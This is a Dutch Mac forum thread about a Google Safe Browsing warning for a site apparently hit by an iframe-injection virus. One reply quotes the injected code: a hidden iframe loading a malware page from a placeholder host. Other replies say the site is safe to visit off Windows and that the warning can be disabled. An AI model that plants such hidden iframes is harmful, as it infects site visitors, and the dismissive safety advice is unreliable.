15 berichten aan het bekijken - 1 tot 15 (van in totaal 15)
  • Q:
    Bijdrager
    EmuuuH

Warning this site may harm your computer

Ik krijg de laatste tijd steeds als ik deze site bezoek, en een paar andere..
    de volgende mededeling:

Ik kan me niet voorstellen dat die site dat doet, en helemaal niet op een mac..

weet iemand hoe ik er vanaf kan komen? de mededeling?

Ik gebruik trouwens safari.

Bijdrager
    rrkramer

en welke DNS gebruik je?

Bijdrager
    inawt

Ik krijg het ook.

Bijdrager
    EmuuuH

DNS?

Bijdrager
    rrkramer

Als je niet weet wat het is, heb je waarschijnlijk de standaard DNS ingesteld van je provider.
    Ik gebruik openDNS en bij mij geeft hij ook deze waarschuwing in Safari.

In Firefox krijg ik trouwens dezelfde waarschuwing, alleen met een iets andere vormgeving. Zal dus wel niet aan DNS liggen.

—————————
    onderstaande uitleg wordt gegeven door Google

Veilig surfen
    Diagnostische pagina voor intrudair.com

Wat is de huidige status van intrudair.com?

Deze site is als verdacht aangemerkt – het bezoeken van deze site kan uw computer beschadigen.

Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.

Wat is er gebeurd toen Google deze site bezocht?

Van de 2 pagina’s die we in de afgelopen 90 dagen op de site hebben getest, hebben 1 pagina(‘s) zonder de toestemming van de gebruiker schadelijke software gedownload en ge├»nstalleerd. De vorige keer dat Google deze site bezocht, was op 2009-06-17. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-06-17.

Schadelijke software wordt op 1 domein(en) gehost, waaronder bigtopcreative.cn/.

This site was hosted on 1 network(s) including AS42864 (GIGANET).

Heeft deze site gefungeerd als een tussenschakel en geleid tot verdere verspreiding van malware?

Het lijkt erop dat intrudair.com in de afgelopen 90 dagen niet heeft gefunctioneerd als tussenschakel voor de infectie van sites.

Heeft deze site malware gehost?

Nee, deze site heeft in de afgelopen 90 dagen geen schadelijke software gehost.

Hoe is dit gebeurd?

In bepaalde gevallen kunnen derden schadelijke codering toevoegen aan echte sites, waarna wij deze waarschuwing weergeven.

Volgende stappen:

* Terug naar de vorige pagina.

Moderator
    Night

intrudair.com???????

Bijdrager
    inawt

In firefox doet hij het bij mij gewoon (firefox 3.5)

Bijdrager
    qazwsx

Hoe weet Google dat ik die site bezoek (als ik er niet heenga via een zoekopdracht?)

Weet Google dan echt alles over mij?

Bijdrager
    DouweM

De zoveelste site die door het iframe FTP virus ‘gegrepen’ is…
    Een virus dat je index.html/whatever aanpast, en er een code als de volgende neerzet:
    [code:1:61ab9062b2]<iframe src="http://XXXXXXX:8080/index.php" width=141 height=158 style="visibility: hidden"></iframe>[/code:1:61ab9062b2]
    Dit iframe probeert dus schadelijke software te downloaden, Google merkt dat, en blokkeert de website.
    Dergelijke berichten kom ik de laatste tijd heel vaak tegen, op sites die 100% goed zijn.

En over Google:
    Zowel Firefox als Safari hebben een deal met Google voor de frauduleuze website-service. Dus elke website die je bezoekt wordt gecheckt langs een lijst van websites in het bestand van Google, en als de site op die lijst staat krijg je een waarschuwing.

Bijdrager
    inawt

Dus je kunt gewoon naar die site gaan?

Bijdrager
    DouweM

Als je geen Windows gebruikt, ja.

Bijdrager
    wouwout

anti-phishing.

dit is een nieuwe feature van safari en firefox. Er staat ergens een database met onbetrouwbare sites. Geniet maar van deze feature.

(ik kan me herinneren dat Safari een tijdje geleden afgekraakt werd omdat er geen anti-phishing in zat. Nu hebben we het en is het ook weer niet goed :D

Bijdrager
    julesp

Je kan het ook uitzetten:

Bijdrager
    wouwout
    ”julesp”

Je kan het ook uitzetten:

mooi iedereen weer tevreden

Moderator
    unSOUND

Was ook hier al besproken:

http://forum.onemorething.nl/viewtopic.php?t=148416

[size=9:013a7f4486]( Bij deze dus het vriendelijke verzoek om in het vervolg eerst de zoekfunctie te gebruiken voor je een nieuw topic start, deze krijgt een slotje )[/size:013a7f4486]

15 berichten aan het bekijken - 1 tot 15 (van in totaal 15)

Je moet ingelogd zijn om een reactie op dit onderwerp te kunnen geven.